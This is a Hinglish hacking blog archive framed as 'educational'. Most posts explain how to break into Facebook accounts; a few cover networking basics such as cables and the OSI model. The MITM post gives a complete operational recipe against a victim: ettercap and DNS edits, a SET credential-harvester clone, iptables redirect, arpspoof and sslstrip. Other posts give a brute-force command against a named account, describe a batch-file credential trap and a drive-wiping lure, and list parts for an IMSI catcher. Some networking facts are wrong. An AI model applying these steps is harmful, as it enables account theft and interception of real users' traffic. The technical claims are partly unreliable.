Wednesday, 13 September 2017

Brute Force attack

Dosto is post par main apko Brute Force attack ke bare mai puri jankari dunga yeh post sirf educational purpose ke liye hai aap apni knowledge ka miss use mat karen. sabse pahle hum jante hai ki Brute Force attack hota kya hai Brute Force attack mai  ek hacker ke pass bahut sari passwords ki list hoti hai jiska use karke ek hacker kisi ki id par Brute Force attack karta hai lekin Brute Force attack mai facebook account hack hone ke bahut hi kam chances hote hai kyunki koi bhi person aisa password nahi rakhta hai jo kisi password list mai easily mil jaye isliye jruri nahi hai ki Brute Force attack se hacker ko har bar hi safaltaa mile or is attack ko karne mai time bhi bahut lagta hai kisi ek particular id par ek ek karke sabhi passwords try kiye jate hai agar password mil jata hai to facebook account hack ho jata hai .



Brute Force attack ko hacker kali linux se bahut easily kar sakta hai windows se bhi kiya ja sakta hai lekin windows se karne ke liye python install hona jaruri hota hai is attack ko karne ke liye hacker ke pass fb.py ya fb.pl ki file honi chahiye or passwords ki list honi chahiye jaise rockyou.txt es attack ko run karne ki commands niche btayi ja rahi hai.

  • Open kali linux terminal 

  • fb.py ya fb.py file ka path jaise file dekstop par hai to cd Desktop
  • python fb.py -u (facebook account id)like nikhil12345 -w (password list)like rockyou.txt then enter
attack start ho jayga lekin yeh depend karta hai password ki list par jiska use hacker kerega agaar password ki list badi hai to jada time lagega agar choti hai to kam time lagega yeh files aapko easily mil jayegi aap google par jakr likhege fb.py download or password list file download apko mil jayegi.


mai ummeed karta hu ki aap sabko Brute Force attack ke bare puri mai jaankari mil gayi hogi. dhyan rahe yeh post sirf educational purpose ke liye hai agar apko post pasand aye to share kare dhanywad  .

Visit karne ke liye apka shukriya

Homoglyph attack (Advance phishing)

Dosto is post par main apko Homoglyph attack (Advance phishing) ke bare mai puri jankari dunga yeh post educational purpose ke liye hai aap apni knowledge ka miss use mat kare Homoglyph attack (Advance phishing) phishing attack ki tarah hi hota hai lekin phishing attack mai hacker ek fake page create karta hai or Homoglyph attack (Advance phishing) fake page ke sath sath fake url bhi create kiya jata hai jo dikhne mai same facebook ki trh hi hota hai jaise manlo ye orignal facebook ka url address hai https://www.facebook.com or yeh fake hai https//:www.facebook.com ab yeh dono dikhne mai bilkul same hai lekin jo fake url create hota hai uska har ek alphabet alag language se liya gya hota hai jo dikhne mai orignal url address ki trh hi hota hai.



 Homoglyph attack (Advance phishing) ke liye online websites bahut ci hai mai aapko ek website se apko picture ke through bata raha hun. ***** This post only for educational purpose*****








mai ummeed karta hu ki aap sabko Homoglyph attack (Advance phishing) ke bare puri mai jaankari mil gayi hogi agar apko post pasand aye to share kare dhanywad .

Visit karne ke liye apka shukriya

Tab Napping

Dosti is post par main aapko Tab Napping ke bare mai puri jankari dunga yeh post sirf educational purpose ke liye hai aap apni knowledge ka miss use mat karen . sabse pahle hum jante hai ki Tab Napping hota kya hai Tab Napping ek tarah se phishing attack ki tarah hi kam karta hai Tab Napping mai hacker ko apne victim ko koi task ke liye kehna padta hai or jb victim us task ko kar rha hota hai tb automatic ek fake page open ho jata hai jis par likha hota hai like continue to task after facebook login uske baad jaise hi victim vaha log in karta hai to username or password hacker ke pass chala jata hai aap ise aise bhi smjh sakte hai jaise manlo ki aap computer par koi work kar rahe hai to automatic kuch login page ki tarah open ho jata hai apne aap redirect hona kisi or page par ise tab napping kaha jata hai main 



Tab Napping attack ko hacker kali linux ka use karke bhi kar sakta hai or windows se bhi kar sakta hai kali linux mai social engineering toolkit mai iska option hai windows mai jo files use hoti hai vo apko niche mil jayegi or yeh files ka use aap xammp server par karke dekh sakte hai .unki pictures apke samne hai 







Link



 mai ummed karta hu ki aapko Tab Napping ke bare mai puri jankari mil gayi hogi dhyan rahe yeh post educational purpose ke liye hai agar post pasand aye to share kariye.

Visit karne ka apka shukriya






Signalling System 7 (ss7 attack)

Dosto is post par main aapko Signalling System 7 (ss7 attack) ke bare mai puri jankari dunga yeh post sirf educational purpose ke liye hai aap apni knowledge ka miss use mat karen . sabse pahle hum jante hai ki Signalling System 7 (ss7 attack) hota kya hai ss7 ek protocol hai jo humare mobile networks mai use hota hai jis par humare  mobile ke networks kam karte haii jaise manlo ki apke pass idea ka sim hai or aap kisi aise area mai hai jaha par idea ke network nahi hai to apka sim kisi or sim ke network ko use karta hai jaise airtel vodafone apne kayi bar dekha bhi hoga kayi bar sims mai network alag dikha raha hota hai aisa ss7 protocol ki vjh se hai.



Signalling System 7 (ss7 attack) mai ek flaw hai ek kami hai jiska use karke hackers kisi bhi mobile par ane vale calls messages ko apne tak redirect kar sakta hai lekin yeh itna asan nahi hai or khatranak bhi hai kyuki hacker network ko hack kar rha hai isme bahut risk bhi hota hai isme or yeh attack har koi kar bhi nahi sakta hai apne youtube par bahut sari videos dekhi hogi ss7 attack ki agar mai kahu ki vo sabhi fake hai to aapko yakeen nahi hoga kyu ki un videos mai ss7 attack mpx ss7 scanner nam ki ek website se karke dikha rahe hai lekin aap khud soche ki ek network ko ek website se hack kiya ja sakta hai nahi na veh sbhi videos fake hai ek bhi real nahi hai aap kisi bhi hacking institute se jakr puch sakte hai apko pata chal jayga ss7 attack IMSI catcher ke bina ho hi nahi sakta . IMSI ek hardware device hai jo networks ko hack karta hai ek mobile sim or mobile tower ke bich mai connection bnaya jata hai is IMSI catcher hardware device ko bnane ke liye ek hacker ko or bhi hardware devices ki jarurt padti hai unki list niche di ja rahi hai.  IMSI catcher ko banane ke liye bahut ci commands bhi chahiye vo main aapko bata nahi sakta kyunki ss7 attack puri trh se illegal hai IMSI catcher ki picture aap niche dekh sakte hai . or yeh device 40000 approx ka hota hai.


  • bladeRF *40
  • Two Quad-band Cellular Duck Antennas SMA
  • Raspberry Pi 3
  • USB battery pack (Power bank) above 25000mah
  • Microsd card 8 GB, 10 GB


 mai ummed karta hu ki aapko Signalling System 7 (ss7 attack) ke bare mai puri jankari mil gayi hogi or facebook hacking ke sabhi attacks ke bare mai puri jankari mil gayi hogi. yeh sabhi tarike sirf educational purpose ke liye hai aap inka miss use kabhi mat kare hacking illegal hai ek cyber crime hai agar aap hacking ka miss use karte hai to apko bahut problem ho sakti hai BE SAFE aab yeh facebook hacking ke sabhi methods complete ho chuke hai. or in sabhi attacks mai se kafi attcaks aise hai jinki jankari aapko kisi institute par nahi di jayegi. aapko CEH V9 ke sabhi topics par post mil jayegi . post achi lage to share jarur karde.


Visit karne ka apka shukriya

Man in the middle attack (MITM)

 Dosto is post par main aapko Man in the middle attack (MITM) ke bare mai puri jankari dunga yeh post sirf educational purpose ke liye hai aap apni knowledge ka miss use mat karen .MITM mai ek hacker user or web server ke bich mai connection bana leta hai jaise maanlo ek user apna facebook account open kar rha hai to ek hacker bich mai MITM attack perform kar de phir user ke pass orignal facebook ka login page open nhi hoga fake page open hoga jise hacker ne bnaya hoga or jb user apna username or password us fake page par enter karega to user ka username or password hacker ke pass pahunch jayga. is attack ko perform karne ke liye hacker ko secure connection ko todna hoga pahle jaise https se http mai convert karna hoga aap is attack ko niche dikhayi gayi picture se smjh sakte hai.



Man in the middle attack (MITM) attack ko hacker kali linux ka use karke bahut asani se kar sakta hai Man in the middle attack (MITM) karne ke liye jin tools ka use hota hai veh kali linux mai inbuilt hi hote hai maine aapko step tp step commands bata raha hu niche. ***** This Post only for educational purpose*****

Commands for MITM attacks


  • Open kali linux terminal
  • Type ( leafpad /etc/ettercap/etter.conf)
  • File open hone ke bad last mai linux likha hoga uske niche 
  • [privis] ec_uid=65534 ec_gid=65534 aapko 65534 ki jgh 0 karna hoga
  • # if you use ip tables likha hoga
  • #redir_command_on  or #redir_command_of likha hoga aapko (#) hash ko hatana hoga dono lines ke age se then save
  • Type ( leafpad /etc/ettercap/etter.dns)
  • file open hone ke bad # redirect it to www.linux.org likha hoga uske niche
  • microsoft.com A 170.170.40.56 or *.microsoft.com A 170.170.40.56 likha hoga aapko ise change karna hoga 
  • aapko microsoft.com vali har line ke age hash lgana hoga # or in lines ke upr likhna hoga
  • * A (Computer ip address) like 192.168.1.111
  • Setoolkit then social-engineering attacks then website attack vectors then credential harvester attack method then site cloner then computer ip address like 192.168.1.111 then website name joo hacker ko clone karni hogi jaise www.facebook.com
  • root/var/www folder mai 3 files ban jayegi hacker ko un files ko html folder mai move karna hoga 
  • another terminal type echo 1 > /proc/sys/net/ipv4/ip_forward 
  • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  • another terminal arpspoof -i eth0 -t (victims Computer ip address) like 192.168.1.112 (gateway ip address) like 192.168.1.1
  • another terminal arpspoof -i eth0 -t (gateway ip address) like 192.168.1.1 (victims Computer ip address) like 192.168.1.112
  • sslstrip -l 8080 
then jab victim facebook.com open karega to uske samne orignal facebook open nhi hogi fake page open hoga or jab victim username or passwords enter kar dega or aapko ek bat or bata rhaa hu kali linux mai jo inbuilt sslstrip hai veh updated browser mai work nahi karta hai kayi bar aap ssltrip2 ka use kar sakte hai git hub se download kar sakte hai aapko google par easily mil jayegi tab ek or command hai dekhne ke liye apko niche btayi ja rahi hai .

  • cat sslstrip.log






















mai ummeed karta hu ki aap sabko Man in the middle attack (MITM) ke bare puri mai jaankari mil gayi hogi dhyan rahe yeh post educational purpose ke liye hai .agar apko post pasand aye to share kare dhanywad .

Visit karne ke liye apka shukriya

    Twisted Pair cable , Straight-Through Cable and Cross over Cable

    • Twisted Pair cable ⇒ Twisted pair cable Lan network mai use hoti hai aone dekha hoga computer labs mai ek cable hoti hai jo switch se humare computer ko connect karti hai use hi twisted pair cable kaha jata hai. ise twisted pair cable isliye kaha jata hai kyunki yeh cable ke wires apas mai twist ki hui hoti hai 8 colours ki bahut patli si wires hoti hai yeh do types ki hoti hai . 
    Cat 5 Cable 


    ∗ Unshielded twisted pair cable ⇒ yeh cable twisted pair cable ka type is cables ki categories hoti hai cat5 or cat 6e cat5 ki speed kam hoti hai cat 6e se cat 5 ki speed 1000Mbps se jada speed hoti hai or cat 6e mai exact 1000Mbps ke speed hoti hai ise IEEE 100baseT ke nam se bhi jana jata hai yeh baseband transmission use karti hai iski segment length 100 meter tak hoti hai yeh cable star topology mai use hoti hai iske both side par RJ-54 connector use hota hai.

    Cat 6e cable


    RJ-45 connector 





    ∗ Shielded twisted pair cable ⇒ yeh bhi Twisted pair cable ka type hai .jaise ki nam se pata chalta hai Shielded isme ek shield bani hoti hai aap picture mai dekh sakte hai jaha par power jada generate hoti hai vaha par Shielded twisted pair cable ka use hota hai jaise ki ek computer lab kisi factory ke ass pass hai to power jada generate hogi to vaha apko Shielded twisted pair cable use karni hogi iski speed 10Gbps hoti hai ise 10GbaseT bhi kaha jata hai isme cat 6a or cat 7  categories use hoti hai iski segment length 100 meter hi hoti hai isme ek 1GbaseT bhi cable available hai or dono cables same hi hoti hai lagbhag .
    Cat 6a
    Cat 7

    • Cross talk ⇒ Twisted pair cable ka use hum cross talk se avoid karne ke liye karte hai jaise jab bhi wires sath mai attach hoti hai or jab ek wire se data pass hota hai or sath mai dusri wire se bhi data pass hota hai to unwanted signals generate hote hai jo ek dusre ki wire ke data ko destroy karte hai isliye cable ko twist kiya jata hai. 
    • Straight-Through Cable ⇒ yeh cable normally kisi device ko switch se connect karne ke liye use hoti hai jaise hum agar switch se computer ko connect karege to vaha par Straight-Through Cable ka use hota hai Straight-Through Cable ka standard (Telecommunications Industry Association) TIA 568B hota hai iska ek colour code hota hai jiska use is cable ko bnane ke liye kiya jata hai 
    • Cross over Cable ⇒ yeh cable ks use hum same device ko connect karne ke liye karte hai. ise TIA 568A bhi kaha jata hai. jaise apko agar computer se computer connect karna hai to aap is cable ka use karege jab aap market se yeh cable lete hai to veh Straight-Through Cable  hoti hai aap chahe to use Cross over Cable  bana sakte hai iski colour coding ke bare mai apko niche picture mai dikhaya gya hai





    • Crimping Tool ⇒ Crimping Tool ka use hum cables ki wires ko change karne ke liye karte hai yeh market se aapko mil jata hai aap iska chaho to use karke dekh sakte hai 

    mai ummeed karta hu ki aap sabko Twisted Pair cable , Straight-Through Cable and Cross over Cable ke bare mai jaankari mil gayi hogi agar apko post pasand aye to share kare dhanywad.

    Transmission Media



    Visit karne ke liye apka shukriya



    Tuesday, 12 September 2017

    Transmission Media

    Dosto is post par main apko Transmission Media ke bare mai puri jankari dunga . sabse pahle jante hai ki Transmission Media hota kya hai yeh ek physical path hota hai data ke communication ka jaise manlo apne apne browser se google.com open kiya hai to apka data cables mai se hokar jata hai physical layer par jaise humne OSI Model mai jana unhi cables ko Transmission Media kehte hai iske do types hote hai guided or unguided guided mai apka data wired ke through pass hota hai jaise cables or unguided apka data wireless ke through pass hota hai jaise wifi .in cables ke bare mai apko puri jankari dunga




    • Fiber optic cable ⇒ Fiber optic cable glass or plastic fibers ki bani hoti hai isme data light ki shape mai flow karta hai iska use do buildings ko network ko milane ke liye kiya jata hai jaise manlo college mai do buildings hai or dono buildings mai alag alag internet connection hai or ek computer client ko dursi buildings ke kisi computer client se data share karna hai to dono buildings ke internet connection ko jodne ke liye fiber optic cable ka use hoga ise hum direct switch mai nahi laga sakte iske port connection alag hote hai .is ke liye hume media converter device ka use karna hota hai . media converter mai do ports hote hai ek mai Fiber Optic attach ki jati hai ek mai twisted cabel attach hoti hai .Fiber Optic cabel pure world mai bichi hui hai samundar ke niche yeh do tarh ki hoti hai.




    Media Converter 



     Fiber Optic cable under the sea iski videos apko dekhni hai to aap dekh sakte hai youtube par aapko pata chal jayga kaise cabels ko samunder ke niche bichaya jata hai


       ∗ Single mode ⇒ Single mode cabel ko (Mono mode) bhi kaha jata hai Single mode cablr ke andar data laser light ke through pass hota hai single line mai data ka flow hota hai  Single mode multi mode cable se thin hoti hai or fast hoti hai or long distance tak data send kar sakti hai ise Isp (internet service provider) use karte hai. iske connector do tarah ke hote hai inko hum direct computer mai bhi laga sakte hai lekin is ke liye apko fiber optic lan card ki jrurti hogi apko images niche dikhayi ja rahi hai.

    Straight tip connector 


     Subscriber Connector / Standard connector



       ∗ Multimode cable ⇒ Multimode cable thick hoti hai Single node cable se or  Multimode cable mai data ka flow multiple LED ke form mai hota hai. ise short distance mai use kiya jata hai do buildings ko jodne ke liye  Multimode cable alag alag speed mai hoti hai 100 Mbit/sec distance up to 2 Km , 1 Gbit/sec distance up to 1000 meters, 10 Gbit.sec distance up to 550 meters.
    • Coaxial cable ⇒ Coaxial cable humere televisions mai use hoti hai apne dekha hoga apke apne ghar mai dth setup box ke back side par ek cable hoti hai use hi Coaxial cable kaha jata hai. iski bandwidths bhi bahut jada hoti hai. yeh do tarah ki hoti hai .


          ∗ Thin net cable ⇒ Thin net cable network mai use hone vali pahli cable thi yeh 1996 ke ass pass use hua karti thi yeh cable Bus topology mai use hoti thi iska standard IEEE 10base2 hota hai IEEE ek organization hai jo cable ke standard ko decide karti hai isme 10base2 ka matlb data transmission rate se hota hai 10 Mbps or 2 ka matlb segment ki length se hai jo 185 meter hota hai isme baseband signal ke through data transfer hota hai . baseband mai single frequency hoti hai isme BNC ( barrel net connector ) T connector ka use hota hai or Bus topology ke both end par terminator use hota tha Topologies  ke bare mai apko age jane ko mil jayga.


      ∗ Thik net cable⇒ yeh dikhne mai Thin net cable ki tarh hi hoti hai iska standard IEEE 10base5 hota hai. isme 10base5 ka matlb data transmission rate se hota hai 10 Mbps or 5 ka matlb segment ki length se hai jo 500 meter hota hai. isme bhi baseband signal mai data flow hota hai ek broadband hota hai broadband mai multiple frequency mai data flow hota hai. iska use do buildings ko jodne ke liye use hoti hai isme (AUI) Attachment unit interface use hoti thi.



    age ki cables ki jankari next post par dekhe 





    mai ummeed karta hu ki aap sabko Transmission Media ke bare mai jaankari mil gayi hogi agar apko post pasand aye to share kare dhanywad.


    Visit karne ke liye apka shukriya


    Batch Script full explanation

    Dosto is post par main aapko Batch Script ke bare mai jankari dunga yeh post sirf educational purpose ke liye hai aap apni knowledge ka miss use mat kare sabse pahle ye jana jaruri hai ki batch script hai kya batch script ek programming language hai apne dekha hoga windows mai kafi files ke extension .bat hoti hai vo batch files hi hoti hai batch files ka use hum automatic kisi program ko rune karvane ke liye karte hai jaise linux mai shell scripting hoti hai thi vaise hi batch script hoti hai jaise manlo ek hacker ko kisi ke computer ki drives format karni hai to hacker ek batch file bna kra victim ke computer par rakh dega or kisi aise name se hogi jiska hacker ko malum hoga ki uska victim dekhega to jarur open karega or victim jaise hi open karega uske drives format ho jayegi.



    aab apko iske through facebook hacking ki jankari de raha hu aap iska miss use mat karen apke knowledge ke liye hai yeh post facebook hack karne ke liye ek hacker apne computer par ek file ko rakhega ab yeh hacker par depend karta hai ki vo kis name se file ko rakhta hai jaise manlo hacker ne file ka name facebook use without internet rakha hai phir us file ko koi bhi open karega to ek command prompt open hoga usme username or password pucha jayga ab normal user ko nahi malum hota ki yeh kya hai vo enter kar dega jaise hi victim apna username or password ko enter karega ek new file automatic create ho jayegi jisme victim ke user name or passwords save ho jayege hacker chahe to batch file ko victim ke computer mai bhi rakh sakta hai or username or passwords ki information mail ke through le sakta hai par is ke liye hacker ko program bnana padega vo main apko programming ke blogs mai bata dunga. main aapko vo batch files de raha hu aap iska practical karke dekh sakte hai .

    main ummed karta hu ki aapko batch script ke bare mai puri jankari mil gayi hogi. post achi lage to share kare dhanywad.


    Social engineering full explanation




    Visit karne ke liye apka shikriya 





    Session Hijacking full explanation

    Dosto is post par main aapko Session Hijacking ke bare main puri jankari dunga yeh post sirf educational purpose ke liye hai. sabse pahle jante hai ki Session Hijacking hota kya hai sabhi websites jab open hoti hai to unka ek session create hota hai jaise manlo apne facebook.com open ki apna username password enter kiya to yeh apka session bana hai kayi log Session Hijacking or Cookies Hijacking ko same samjhte hai lekin aisa nahi hai yeh dono mai bahut antar hai main aapko btata hu Sessions jo save hote hai vo server par hote hai or session id bhi banti hai ek or server par session store karne ke liye unlimited space hota hai or bahut secure bhi hota hai. apko youtube par bahut sari videos mai mil jayga jaha Session Hijacking or Cookies Hijacking ko same btaya jata hai par aisa bilkul nahi hai .


    aab mai apko bata raha hu ki hacker is attack ko karta kaise hai main aapko yeh attack perform karke nahi dikha sakta ek bar mera youtube channel isi hacking ki videos ki vjh se delete hua hai isliye par main apko iske bare mai pura btaunga jarur ki kaise ek hacker ise karta hai jaise ki maine btaya ki session server par stored hote hai to ek hacker user or server ke bich mai connection bana leta hai phir jab user facebook.com ko open karta hai apna username password enter karta hai to vo session server ke pass user ke through nahi jata pahle hacker ke pass jata hai phir hacker server ko bhejta hai is tarh se hacker session ko hijack bhi kar leta hai or user ke pass uska facebook account open bhi ho jata hai or user ko kuch bhi nahi pata chalta ye attack bahut hi dangerous hai aap ise kabhi mat karen kyu ki agar server ko kuch bhi nuksan hua apki galti ki vjh se to aapko bahut problem  bhi ho sakti hai .aap is picture se samjh sakte hai.

    mai ummeed karta hu ki aap sabko ke bare Session Hijacking ki  puri mai jaankari mil gayi hogi agar apko post pasand aye to share kare dhanywad.



    Social engineering full explanation







    Visit karne ka apka shukriya.

    USB Stealer Full explanation

    Dosto is post par main apko USB Stealer ke bare main puri jankari dunga yeh post sirf educational purpose ke liye hai aap apni knowledge ka miss use mat karen . jaise ki sabhi jante hai USB hai kya ek pen drive USB pen drive se bhi ek hacker Facebook hack kar sakta hai jaise ki jadtar log apne facebok account ka username password save rakhte hai apne browser mai taki jab dubara open kare to unhe username password na bharna pade apne dekha hoga jab aap facebook par login hote hai to browser apse puchta hai remember me agar aap remember me par click karte hai to username password browser mai save ho jate hai ise USB Pen drive se ek hacker nikal sakta hai .




    aab apko bata raha hu ek hacker kaise apni normal pen drive ko USB Stealer bnata hai aapne youtube par bahut sari videos dekhi hogi is par vaha file bnayi jati hai launch.bat or autorun.inf name se phir usb ko kisi computer par plug karke passwords ko nikala jata hai lekin vo ab work nhi karti vo windows xp par hi work karti hai or jaise ki sabko malum hai ki windows xp ka use bahut hi kam hota hai. 

    windows 7 se upr ke sabhi versions ke liye ek hacker ko usb rubber ducky ka use karna padega usb rubber ducky ek hardware hai isme ducky codes inject karke kisi bhi computer se saved passwords ko nikala ja sakta hai. aap chaho to arduino se apni normal usb ko rubber ducky bana sakte hai chaho to apne android phone ko bhi as a rubber ducky use kar sakte hai par phone rooted hona chahiye apko inke links niche mil jayege. ise bachne ke liye aap kabhi apne browser mai passwords ko save mat kare.


    Links

    https://hakshop.com/products/usb-rubber-ducky-deluxe

    Arduino 


    mai ummeed karta hu ki aap sabko USB Stealer ke bare mai jaankari mil gayi hogi agar apko post pasand aye to share kare dhanywad.


    Visit karne ke liye apka shukriya


    Cookies Hijacking full explanation

    Dosto is Post par main aapko Cookies Hijacking ke bare mai puri jankari dunga yeh post sirf educational purpose ke liye hai aap apni knowledge ka miss use mat karen jaise ki maine pahle btaya hai ki session hijacking or cookies hijacking same nahi hote abb mai apko batat hu Cookies Hijacking hota kya hai Cookies Hijacking apke browser mai hota hai apke browser mai saved hoti hai unhe Cookies kaha jata hai jaise manlo apne facebook.com open ki apna username password enter kiya or apka facebook account open ho gya or apke browser mai apke accont ki cookies bhi saved ho gyi hai aise sirf facebook.com mai nahi hota hai aap kisi bhi wesbite ko open karte hai to us wesbite ki cookies apke browser mai save hoti hai aapne bahut bar dekha hoga apne kisi website par login kiya hai or apko message show hota hoga saved cookies ka us par got it likha hota hai aap got it karte hai to vo messsage band ho jata hai iska matlab yahi hota hi ki us website ke cookies apke browser mai save ho chuki hai yahi fark hota hai Cookies Hijacking or Session Hijacking mai Cookies Hijacking mai apke browser par cookies save hoti hai or Session Hijacking mai server par sessions store hote hai or Cookies jada secure bhi nahi hoti or inka space bhi limited hi hota hai.



    aab apko bat raha hun ki ek hacker cookies ko hijack kaise karta hai cookies ek normal txt file mai banti hai vo file agar kisi hacker ke pass ho to vo facebook account ko bina password ke open kar sakta hai jaise manlo apka facebook account open hai or cookies browser mai stored hai or vo cookies ek hacker ko mil gayi to vo apka facebook accont easily open kar sakta hai is ke liye aapko  extension bata raha hu uska link aapko mil jayga aap iska practical karke dekh sakte hai iska practical maine apne youtube channel par dala tha par channel delete ho gya hai.




    link 

    Cookies manager 

    Networking blog 


    mai ummeed karta hu ki aap sabko ke bare Cookies 
    Hijacking ki  puri mai jaankari mil gayi hogi agar apko post pasand aye to share kare dhanywad.

    Visit karne ka apka shukriya.

    OSI Model

    Dosto is post par main aapko OSI Model ke bare mai puri jankari dunga sabse pahle main apko bata raha hun ki OSi Model hai kya OSI ki full form open system interconnection hota hai. jab do user ke bach mai ya kisi website or user ke bich mai koi communication hota hai. jaise aap kisi website ko open kar rahe hain manlo Google.com to apke google.com open karne se lekar open hone tak ke bich mai jo processing hoti hai use hi OSI Model kaha jata hai vaise ab OSI Model ko TCP/IP Model mai change kar diya gaya hai uske bare mai hum agee janenge . ek normal user ko sirf itna hi malum hota hai ki usne website open ki or open ho gayi par bich mai process kya hota hai uske bare mai use jankari nahi hoti. paar ek ethical hacker bana hai to networking ki bahut jankari honi chahiye. OSI Model ki seven layers hoti hai . or ye reverse chalti hai user ke through jab kisi website ko open karne ki request send ki jati hai. jaise seven to one  or jab request website par ja rahi hoti hai tab ye one to seven chalti hai main aapko seven layers ki puri jankari de raha hun.





    7. Application layer

    6. Presentation layer

    5. Session layer

    4. Transport layer

    3. Network layer

    2. Data Link Layer

    1. Physical layer


    • Application layer⇒ Application layer par apke computer ke sabhi applicationas aaplication layer par chalti hai jaise aap chahe internet surfing kare ya koi software use kare koi game khele yeh sabhi chije application layer par hi work karti hai . application layer se hote hue apki request physical layer tak jati hai.


    • Presentation  layer⇒ Presentation layer data ko "generi- fies" karta hai jaise aapne application layer par apne browser par google.com open kiya hai  aab computer ko google.com ka format nahi malum hai jasie google.com ek web page hai or web page html format mai hota hai to presentation layer par data ka format ko phchana jata hai. or sath hi presentation layer encryption service bhi provide karti hai jaise jo websites secure hoti hai https://www.google.com yeh chij bhi presentation layer par hi define hoti hai.
    • Session layer⇒ Session layer ka kam kisi bhi appplication ko start karna or uska end karna hota hai jaise aapne apne browser mai ek tab par google.com  open kiya hua hai ek tab par microsoft.com open ki hai ek tab par facebook.com open ki hai to es chij ka dhyan ki sbhi webpages open ho or close ho session layaer par rakha jata hai. jaruri nahi ki web pages ho koi software bhi ho sakta hai. software ko start or end karna session layer ka kam hota hai. or application layer, presentation layer , session layer par jo kam hote hai sabhi operating system par hi ho jate hai. or baki bachi hui four layers network par work karti hai
    • Transposrt layer⇒ Transport layer par yeh dekha jata hai ki data ko kaise bhejna hai reliable ya non-reliable matlab TCP ya UDP se bhejna hai reliable ka matlb hota hai ki data source computer se destination computer tak phch raha hai ya nahi sahi tarah se jaise manlo aapne server par 5 mb ki file ko upload karna hai to vo file 5 mb ki 5 parts mai divide ho jayegi 1 mb, 1 mb , 1 mb, 1 mb , 1 mb or apki file ke sabhi packets sahi tarike se server par upload hoge agr nahi hote manlo ek packet miss ho gya 1 mb ka to apka computer dubara usi 1 mb ke part ko upload karega upload hone par server se ek acknowledgment user tak ata hai file milne ka  non-reliable ka use real time applocation mai hota hai jaise voice over ip jaise televisions or data ko kis port se bhejna hai ye bhi Transport layer par hi define hota hai. jaise web request 80 ya 443 port no par jati hai.
    •  Network layer⇒  Network layer par Logical Addressing hoti hai aap ise IP Addressing bhi keh sakte hai Network layer par apke computer ka IP address check hota hai or apne jaha requset send ki hai uska IP address bhi jana jata hai or apke computer se Destination tak pahuchne ke best path konsa hai yeh bhi Network layer par hi define hota hai.
    •  Data Link layer⇒ Data Link layer pat Physical addressing hoti hai apke computer ke mac address ko define kiya jata hai or sath hi Data error-free send ho is bat ka dhyan bhi Data Link layer karti hai. jaise apka bheje hue data mai kisi tarah ki koi error na ho yeh Data Link layer par hi define hota hai.
    • Physical layer⇒ Physical layer par apke computer ki cables work karti hai jaise apke computer mai jitni bhi cables hoti hai vo sabhi Physical layer par hi work karti hai or apka data zero or one ki format mai bhi Physical layer par hi convert ho jata hai. phir apka data zero or one ke format mai cables se flow karta hua apke Destination address tak pahuchta hai.

    main ummed karta hu ki aapko OSI Model ke bare mai puri jankari mil gayi hogi. post achi lage to share kare dhanywad.


    Visit karne ke liye apka shukriya